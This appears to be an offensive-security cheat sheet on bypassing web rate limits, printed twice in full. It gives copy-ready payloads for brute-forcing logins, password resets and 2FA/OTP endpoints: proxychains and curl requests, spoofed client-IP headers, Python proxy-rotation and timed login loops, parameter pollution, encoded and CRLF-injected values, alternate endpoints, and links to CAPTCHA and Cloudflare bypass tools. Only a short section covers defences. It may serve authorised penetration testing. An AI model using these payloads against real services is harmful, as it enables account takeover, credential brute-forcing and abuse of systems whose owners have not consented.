Rate Limit Bypass

Bypass rate limiting mechanisms using IP spoofing, header manipulation, proxy rotation, parameter variation, encoding tricks, and timing-based evasion.

18 Categories33 CommandsCopy Ready

Rate Limit Bypass

Rate limit bypass techniques using headers, IP rotation, race conditions, and caching.

Last updated: 2026-05-15

Intro

Introduction

1 commands

1Common mechanisms: IP-based, Token Bucket, Leaky Bucket, Geographic/Region, User-based limits.

Rate limiting controls how many requests a user can make within a period. Bypassing it enables brute-force attacks, DoS, and data scraping. This guide covers 15+ bypass techniques with tools and payloads.

Tech 1

IP Spoofing

3 commands

1#1 Rotate IPs via proxychains — each request appears from a different source

proxychains curl -X POST https://target.com/login -d "user=admin&pass=1234"

2#2 BurpFakeIP — Burp extension to spoof IP headers and bypass rate limits

https://github.com/AeolusTF/BurpFakeIP

3#3 IP Rotate — PortSwigger extension for IP rotation in Burp

https://github.com/PortSwigger/ip-rotate

Tech 2

Changing User-Agent

1 commands

1Rate limit systems often track by User-Agent. Rotating User-Agent makes each request appear from a different client.

Use Burp Intruder with a wordlist of User-Agent strings → Set User-Agent as payload position → Rotate on each request

Tech 3

Header Manipulation — Spoof IP

7 commands

1Spoof client IP — often trusted by proxies and web apps

X-Forwarded-For: 127.0.0.1

2Common in NGINX setups — can trick access controls

X-Real-IP: 127.0.0.1

3Spoofs IP — sometimes logged or used for rate limiting

X-Client-IP: 127.0.0.1

4Cloudflare client IP header — some apps trust it directly

CF-Connecting-IP: 127.0.0.1

5Fastly CDN client IP header

Fastly-Client-IP: 127.0.0.1

6Additional spoofable IP headers

X-Remote-IP: 127.0.0.1 | X-Remote-Addr: 127.0.0.1 | True-Client-IP: 127.0.0.1 | X-Cluster-Client-IP: 127.0.0.1

7BurpFakeIP — automate IP header spoofing in Burp

https://github.com/AeolusTF/BurpFakeIP

Tech 4

Proxy Rotation (Python)

1 commands

1Rotate proxies in Python — each request uses a different proxy, bypassing IP-based rate limits

import requests
proxies = [
    {"http": "http://proxy1.com:8080"},
    {"http": "http://proxy2.com:8080"},
    {"http": "http://proxy3.com:8080"}
]
for proxy in proxies:
    response = requests.get("https://example.com/api", proxies=proxy)
    print(response.status_code)

Tech 5

Different HTTP Methods

3 commands

1#1 Try POST method

curl -X POST https://target.com/login -d "user=admin&pass=1234"

2#2 Try GET method — some rate limiters only track POST

curl -X GET "https://target.com/login?user=admin&pass=1234"

3#3 Some rate limiters focus only on specific methods

Try: PUT, DELETE, PATCH, OPTIONS, HEAD

Tech 6

Parameter Name Variation

1 commands

1Different parameter names may bypass input filters and WAFs that track specific param names

username=admin&password=1234 | user=admin&pass=1234 | uname=admin&pwd=1234 | login=admin&passwd=1234 | u=admin&p=1234 | email=admin&key=1234 | id=admin&token=1234

Tech 7

Parameter Pollution

1 commands

1Duplicate parameters confuse rate-limiting mechanisms — server may process only one or both

POST /login HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

user=admin&user=admin2&pass=1234

Tech 8

Alternate Endpoints

1 commands

1Test all alternate endpoints — mobile/API endpoints often lack rate limiting applied to the web version

/login /user/login /account/login /api/login /api/v1/login /api/v2/login /mobile/login /auth/login /authenticate /session/create /customers/signin /users/auth /rest/v1/login

Tech 9

Encoding Tricks

2 commands

1#1 Encoded payloads — spaces, null bytes, hex, partial encoding, double encoding

user=admin%20 | user=admin%00 | user=%61%64%6d%69%6e | user=ad%6Din | user=%2561%2564%256d%2569%256e

2#2 Switch content types — parsers may behave differently

Content-Type: application/json {"user":"admin"} vs Content-Type: application/x-www-form-urlencoded user=admin

Tech 10

Time-Based Manipulation

1 commands

1Control request intervals — sleep just below the rate limit threshold to avoid triggering blocks

import requests, time
for i in range(10):
    r = requests.post("https://target.com/login", data={"user":"admin","pass":"1234"})
    print(r.status_code)
    time.sleep(0.9)

Tech 11

Special Character Injection

1 commands

1Null byte, CRLF header injection, trailing space, newline — bypass filters and exploit parser quirks

email=test@example.com%00 | email=test@example.com%0D%0AHeader:injected | email=test@example.com%20 | email=test@example.com%0A

Tech 12

Case Sensitivity & Font Tricks

2 commands

1#1 Mixed case — some systems validate differently based on case

Email: Test@Example.com | test@example.com | TEST@example.com

2#2 Look-alike characters — '3' for 'e', dots, Unicode homoglyphs

t3st@3xample.com | te.st@example.com

Tech 13

Blank Characters & Zero-Width Spaces

1 commands

1Spaces, zero-width space, tab, newline — break input parsing and bypass filters

email=" test@example.com " | email=test@example.com%20 | email=test@example.com%E2%80%8B | email=test@example.com%09 | email=test@example.com%0A

Tech 14

CAPTCHA Bypass Tools

2 commands

1Automated Google reCAPTCHA bypass tool

https://github.com/sarperavci/GoogleRecaptchaBypass

2Cloudflare protection bypass for scraping

https://github.com/sarperavci/CloudflareBypassForScraping

Tech 15

Real-World Endpoints to Test

1 commands

1Test rate limit bypass on: registration, login, password reset, 2FA/OTP, messaging, invites, QR codes, disabling 2FA, resend OTP

Account registration/signup | Login/account lock | Forgot/reset password | 2FA/MFA/OTP | Messaging/comments/invites | Disabling 2FA/SMS | Resend OTP code

Tech 16

Defensive Measures

3 commands

1#1 CAPTCHA blocks automated requests

CAPTCHA — verify user is human

2#2 Detect unusual patterns in request frequency

Anomaly detection — monitor traffic spikes

3#3 Rate limit based on multiple signals, not just IP

Advanced rate limiting — cookies, session tokens, JavaScript challenges

Tech 17

Conclusion

1 commands

1Combine: IP rotation → header spoofing → proxy rotation → method/param variation → time-based evasion

Rate limit bypass is about observation, creativity, and persistence. Understand the logic, test methodically, and adapt. When you hit a rate limit, see it as an invitation to hack smarter.

Tools

Tools & Resources

BurpFakeIP

Burp extension for IP header spoofing to bypass rate limits

IP Rotate (PortSwigger)

Official PortSwigger IP rotation extension for Burp

Google reCAPTCHA Bypass

Automated reCAPTCHA bypass tool

Cloudflare Bypass

Cloudflare protection bypass for web scraping

Rate Limit Bypass

Bypass rate limiting mechanisms using IP spoofing, header manipulation, proxy rotation, parameter variation, encoding tricks, and timing-based evasion.

18 Categories33 CommandsCopy Ready

Rate Limit Bypass

Rate limit bypass techniques using headers, IP rotation, race conditions, and caching.

Last updated: 2026-05-15

Intro

Introduction

1 commands

1Common mechanisms: IP-based, Token Bucket, Leaky Bucket, Geographic/Region, User-based limits.

Rate limiting controls how many requests a user can make within a period. Bypassing it enables brute-force attacks, DoS, and data scraping. This guide covers 15+ bypass techniques with tools and payloads.

Tech 1

IP Spoofing

3 commands

1#1 Rotate IPs via proxychains — each request appears from a different source

proxychains curl -X POST https://target.com/login -d "user=admin&pass=1234"

2#2 BurpFakeIP — Burp extension to spoof IP headers and bypass rate limits

https://github.com/AeolusTF/BurpFakeIP

3#3 IP Rotate — PortSwigger extension for IP rotation in Burp

https://github.com/PortSwigger/ip-rotate

Tech 2

Changing User-Agent

1 commands

1Rate limit systems often track by User-Agent. Rotating User-Agent makes each request appear from a different client.

Use Burp Intruder with a wordlist of User-Agent strings → Set User-Agent as payload position → Rotate on each request

Tech 3

Header Manipulation — Spoof IP

7 commands

1Spoof client IP — often trusted by proxies and web apps

X-Forwarded-For: 127.0.0.1

2Common in NGINX setups — can trick access controls

X-Real-IP: 127.0.0.1

3Spoofs IP — sometimes logged or used for rate limiting

X-Client-IP: 127.0.0.1

4Cloudflare client IP header — some apps trust it directly

CF-Connecting-IP: 127.0.0.1

5Fastly CDN client IP header

Fastly-Client-IP: 127.0.0.1

6Additional spoofable IP headers

X-Remote-IP: 127.0.0.1 | X-Remote-Addr: 127.0.0.1 | True-Client-IP: 127.0.0.1 | X-Cluster-Client-IP: 127.0.0.1

7BurpFakeIP — automate IP header spoofing in Burp

https://github.com/AeolusTF/BurpFakeIP

Tech 4

Proxy Rotation (Python)

1 commands

1Rotate proxies in Python — each request uses a different proxy, bypassing IP-based rate limits

import requests
proxies = [
    {"http": "http://proxy1.com:8080"},
    {"http": "http://proxy2.com:8080"},
    {"http": "http://proxy3.com:8080"}
]
for proxy in proxies:
    response = requests.get("https://example.com/api", proxies=proxy)
    print(response.status_code)

Tech 5

Different HTTP Methods

3 commands

1#1 Try POST method

curl -X POST https://target.com/login -d "user=admin&pass=1234"

2#2 Try GET method — some rate limiters only track POST

curl -X GET "https://target.com/login?user=admin&pass=1234"

3#3 Some rate limiters focus only on specific methods

Try: PUT, DELETE, PATCH, OPTIONS, HEAD

Tech 6

Parameter Name Variation

1 commands

1Different parameter names may bypass input filters and WAFs that track specific param names

username=admin&password=1234 | user=admin&pass=1234 | uname=admin&pwd=1234 | login=admin&passwd=1234 | u=admin&p=1234 | email=admin&key=1234 | id=admin&token=1234

Tech 7

Parameter Pollution

1 commands

1Duplicate parameters confuse rate-limiting mechanisms — server may process only one or both

POST /login HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

user=admin&user=admin2&pass=1234

Tech 8

Alternate Endpoints

1 commands

1Test all alternate endpoints — mobile/API endpoints often lack rate limiting applied to the web version

/login /user/login /account/login /api/login /api/v1/login /api/v2/login /mobile/login /auth/login /authenticate /session/create /customers/signin /users/auth /rest/v1/login

Tech 9

Encoding Tricks

2 commands

1#1 Encoded payloads — spaces, null bytes, hex, partial encoding, double encoding

user=admin%20 | user=admin%00 | user=%61%64%6d%69%6e | user=ad%6Din | user=%2561%2564%256d%2569%256e

2#2 Switch content types — parsers may behave differently

Content-Type: application/json {"user":"admin"} vs Content-Type: application/x-www-form-urlencoded user=admin

Tech 10

Time-Based Manipulation

1 commands

1Control request intervals — sleep just below the rate limit threshold to avoid triggering blocks

import requests, time
for i in range(10):
    r = requests.post("https://target.com/login", data={"user":"admin","pass":"1234"})
    print(r.status_code)
    time.sleep(0.9)

Tech 11

Special Character Injection

1 commands

1Null byte, CRLF header injection, trailing space, newline — bypass filters and exploit parser quirks

email=test@example.com%00 | email=test@example.com%0D%0AHeader:injected | email=test@example.com%20 | email=test@example.com%0A

Tech 12

Case Sensitivity & Font Tricks

2 commands

1#1 Mixed case — some systems validate differently based on case

Email: Test@Example.com | test@example.com | TEST@example.com

2#2 Look-alike characters — '3' for 'e', dots, Unicode homoglyphs

t3st@3xample.com | te.st@example.com

Tech 13

Blank Characters & Zero-Width Spaces

1 commands

1Spaces, zero-width space, tab, newline — break input parsing and bypass filters

email=" test@example.com " | email=test@example.com%20 | email=test@example.com%E2%80%8B | email=test@example.com%09 | email=test@example.com%0A

Tech 14

CAPTCHA Bypass Tools

2 commands

1Automated Google reCAPTCHA bypass tool

https://github.com/sarperavci/GoogleRecaptchaBypass

2Cloudflare protection bypass for scraping

https://github.com/sarperavci/CloudflareBypassForScraping

Tech 15

Real-World Endpoints to Test

1 commands

1Test rate limit bypass on: registration, login, password reset, 2FA/OTP, messaging, invites, QR codes, disabling 2FA, resend OTP

Account registration/signup | Login/account lock | Forgot/reset password | 2FA/MFA/OTP | Messaging/comments/invites | Disabling 2FA/SMS | Resend OTP code

Tech 16

Defensive Measures

3 commands

1#1 CAPTCHA blocks automated requests

CAPTCHA — verify user is human

2#2 Detect unusual patterns in request frequency

Anomaly detection — monitor traffic spikes

3#3 Rate limit based on multiple signals, not just IP

Advanced rate limiting — cookies, session tokens, JavaScript challenges

Tech 17

Conclusion

1 commands

1Combine: IP rotation → header spoofing → proxy rotation → method/param variation → time-based evasion

Rate limit bypass is about observation, creativity, and persistence. Understand the logic, test methodically, and adapt. When you hit a rate limit, see it as an invitation to hack smarter.

Tools

Tools & Resources

BurpFakeIP

Burp extension for IP header spoofing to bypass rate limits

IP Rotate (PortSwigger)

Official PortSwigger IP rotation extension for Burp

Google reCAPTCHA Bypass

Automated reCAPTCHA bypass tool

Cloudflare Bypass

Cloudflare protection bypass for web scraping